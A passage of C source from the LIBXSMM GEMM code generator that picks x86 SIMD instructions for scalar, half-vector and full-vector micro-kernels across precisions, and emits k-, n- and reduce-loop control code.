io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VPDPBUSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VPADDD;
} else if ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
/* C is 32bit, so we treat all 3 matrices as 32bit element arrays */
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VPBROADCASTD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VDPBF16PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else {
/* shouldn't happen as we caught this case earlier */
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
} else {
/* should not happen */
}
io_micro_kernel_config->prefetch_instruction = LIBXSMM_X86_INSTR_PREFETCHT1;
io_micro_kernel_config->alu_add_instruction = LIBXSMM_X86_INSTR_ADDQ;
io_micro_kernel_config->alu_sub_instruction = LIBXSMM_X86_INSTR_SUBQ;
io_micro_kernel_config->alu_cmp_instruction = LIBXSMM_X86_INSTR_CMPQ;
io_micro_kernel_config->alu_jmp_instruction = LIBXSMM_X86_INSTR_JL;
io_micro_kernel_config->alu_mov_instruction = LIBXSMM_X86_INSTR_MOVQ;
}
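/* Initializes the micro-kernel configuration for half-vector (128-bit xmm)
   code paths on AVX/AVX2. SSE targets are redirected to the scalar
   configuration and AVX-512 targets to the full-vector configuration, as
   the warnings emitted below indicate. */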
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_init_micro_kernel_config_halfvector( libxsmm_micro_kernel_config* io_micro_kernel_config,
const unsigned int i_arch,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_use_masking_a_c ) {
if ( (i_arch < LIBXSMM_X86_SSE3) || (i_arch > LIBXSMM_X86_ALLFEAT) ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
} else if ( i_arch <= LIBXSMM_X86_SSE4 ) {
#if !defined(NDEBUG)
fprintf(stderr, "LIBXSMM WARNING, libxsmm_generator_gemm_init_micro_kernel_config_halfvector, redirecting to scalar, please fix the generation code!!!\n");
#endif
libxsmm_generator_gemm_init_micro_kernel_config_scalar( io_micro_kernel_config, i_arch, i_xgemm_desc, i_use_masking_a_c );
} else if ( i_arch <= LIBXSMM_X86_AVX2 ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_AVX;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 2;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VMOVDDUP;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPD;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPD;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
} else {
io_micro_kernel_config->vector_length = 4;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPS;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
}
} else if ( i_arch <= LIBXSMM_X86_ALLFEAT ) {
#if !defined(NDEBUG)
fprintf(stderr, "LIBXSMM WARNING, libxsmm_generator_gemm_init_micro_kernel_config_halfvector, AVX512 redirecting to fullvector!\n");
#endif
libxsmm_generator_gemm_init_micro_kernel_config_fullvector( io_micro_kernel_config, i_arch, i_xgemm_desc, i_use_masking_a_c );
} else {
/* should not happen */
}
io_micro_kernel_config->prefetch_instruction = LIBXSMM_X86_INSTR_PREFETCHT1;
io_micro_kernel_config->alu_add_instruction = LIBXSMM_X86_INSTR_ADDQ;
io_micro_kernel_config->alu_sub_instruction = LIBXSMM_X86_INSTR_SUBQ;
io_micro_kernel_config->alu_cmp_instruction = LIBXSMM_X86_INSTR_CMPQ;
io_micro_kernel_config->alu_jmp_instruction = LIBXSMM_X86_INSTR_JL;
io_micro_kernel_config->alu_mov_instruction = LIBXSMM_X86_INSTR_MOVQ;
}
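/* Initializes the micro-kernel configuration for scalar code paths: one
   element per register (MOVSS/MOVSD on SSE; VMOVSS/VMOVSD plus scalar FMA
   on AVX2 and later). This also serves as the fallback target of the
   half-vector configuration above. */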
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_init_micro_kernel_config_scalar( libxsmm_micro_kernel_config* io_micro_kernel_config,
const unsigned int i_arch,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_use_masking_a_c ) {
if ( ( i_arch < LIBXSMM_X86_SSE3 ) || ( i_arch > LIBXSMM_X86_ALLFEAT ) ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
} else if ( i_arch <= LIBXSMM_X86_SSE4 ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_SSE3;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 8;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVSD;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDSD;
} else {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 4;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPS;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULSS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDSS;
}
} else if ( i_arch <= LIBXSMM_X86_ALLFEAT ) {
io_micro_kernel_config->instruction_set = i_arch;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 8;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVSD;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPD;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDSD;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231SD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
} else {
io_micro_kernel_config->vector_length = 1;
io_micro_kernel_config->datatype_size = 4;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVSS;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPS;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULSS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDSS;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231SS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
}
}
} else {
/* should not happen */
}
io_micro_kernel_config->prefetch_instruction = LIBXSMM_X86_INSTR_PREFETCHT1;
io_micro_kernel_config->alu_add_instruction = LIBXSMM_X86_INSTR_ADDQ;
io_micro_kernel_config->alu_sub_instruction = LIBXSMM_X86_INSTR_SUBQ;
io_micro_kernel_config->alu_cmp_instruction = LIBXSMM_X86_INSTR_CMPQ;
io_micro_kernel_config->alu_jmp_instruction = LIBXSMM_X86_INSTR_JL;
io_micro_kernel_config->alu_mov_instruction = LIBXSMM_X86_INSTR_MOVQ;
}
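/* Appends a FLOP counter to C-source output (code_type == 0). Based on the
   snprintf calls below, the emitted snippet looks like the following, with
   2*m*n*k baked in as a decimal literal:

     #ifndef NDEBUG
     #ifdef _OPENMP
     #pragma omp atomic
     #endif
     libxsmm_num_total_flops += <2*m*n*k>;
     #endif
*/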
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_add_flop_counter( libxsmm_generated_code* io_generated_code,
const libxsmm_gemm_descriptor* i_xgemm_desc ) {
if ( io_generated_code->code_type == 0 ) {
char l_new_code[512];
const unsigned int l_max_code_length = sizeof(l_new_code) - 1;
int l_code_length = 0;
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#ifndef NDEBUG\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#ifdef _OPENMP\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#pragma omp atomic\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#endif\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "libxsmm_num_total_flops += %u;\n", 2u * i_xgemm_desc->m * i_xgemm_desc->n * i_xgemm_desc->k);
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
l_code_length = LIBXSMM_SNPRINTF( l_new_code, l_max_code_length, "#endif\n" );
libxsmm_append_code_as_string( io_generated_code, l_new_code, l_code_length );
}
}
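/* k-loop header/footer pair. A rough sketch of the control flow the two
   functions emit (pseudo-assembly; register names are illustrative only):

     mov  kloop, 0               ; header: reset the k counter
   label:                        ; header: jump-back label
     add  kloop, i_k_blocking    ; header: advance by the blocking factor
     ...micro-kernel body...
     cmp  kloop, i_max_blocked_k ; footer: compare against the blocked K
     jl   label                  ; footer: iterate while below

   When i_kloop_complete is set, the footer additionally rewinds the B
   pointer by k columns (respecting LIBXSMM_GEMM_FLAG_TRANS_B). */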
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_kloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const unsigned int i_m_blocking,
const unsigned int i_k_blocking ) {
LIBXSMM_UNUSED(i_m_blocking);
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_mov_instruction, i_gp_reg_mapping->gp_reg_kloop, 0);
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_kloop, i_k_blocking);
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_kloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_max_blocked_k,
const unsigned int i_kloop_complete ) {
LIBXSMM_UNUSED(i_m_blocking);
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_kloop, i_max_blocked_k );
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
if ( i_kloop_complete != 0 ) {
int l_b_offset = 0;
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) > 0 ) {
l_b_offset = i_xgemm_desc->ldb * i_xgemm_desc->k * i_micro_kernel_config->datatype_size;
} else {
l_b_offset = i_xgemm_desc->k * i_micro_kernel_config->datatype_size;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_b, l_b_offset );
}
}
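/* reduce-loop header/footer pair, emitted around batch-reduce kernels: the
   header zeroes gp_reg_reduce_loop and places the jump-back label; the
   footer increments the counter, compares it against gp_reg_reduce_count
   and jumps back while it is smaller. */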
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_reduceloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_mov_instruction, i_gp_reg_mapping->gp_reg_reduce_loop, 0);
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_reduceloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc) {
LIBXSMM_UNUSED(i_xgemm_desc);
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_reduce_loop, 1);
libxsmm_x86_instruction_alu_reg( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_reduce_count, i_gp_reg_mapping->gp_reg_reduce_loop);
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
}
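/* n-loop header/footer pair: the header places the jump-back label,
   advances the n counter by i_n_blocking and resets the m counter. The
   footer moves the C pointer (and, for the BL2-via-C prefetch variants,
   the B-prefetch pointer) to the next n panel, rewinds A and advances B,
   per batch-reduce entry when LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS is
   set, and loops while the n counter is below i_n_done. Note the C
   advance is scaled down for BF16 and I8 outputs, whose elements are
   narrower than the 32-bit accumulators. */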
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_nloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const unsigned int i_n_blocking) {
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_nloop, i_n_blocking );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_mov_instruction, i_gp_reg_mapping->gp_reg_mloop, 0 );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_nloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_n_blocking,
const unsigned int i_n_done ) {
if ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size/2)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size/2)) );
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size/4)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size/4)) );
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
}
/* B prefetch */
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C_AHEAD ) {
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) == 0 ) {
unsigned int l_type_scaling;
if ( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ||
(LIBXSMM_GEMM_PRECISION_I16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ) {
l_type_scaling = 2;
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
l_type_scaling = 4;
} else {
l_type_scaling = 1;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_b_prefetch,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size/l_type_scaling)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size/l_type_scaling)) );
}
}
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_c_prefetch,
(i_n_blocking*(i_xgemm_desc->ldc)*(i_micro_kernel_config->datatype_size)) - ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
}
#endif
if (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS) {
/* handle trans B */
int l_b_offset = 0;
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) > 0 ) {
l_b_offset = i_n_blocking * i_micro_kernel_config->datatype_size;
} else {
l_b_offset = i_n_blocking * i_xgemm_desc->ldb * i_micro_kernel_config->datatype_size;
}
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_generator_gemm_header_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_help_0, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_b,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_help_0, l_b_offset );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_b,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
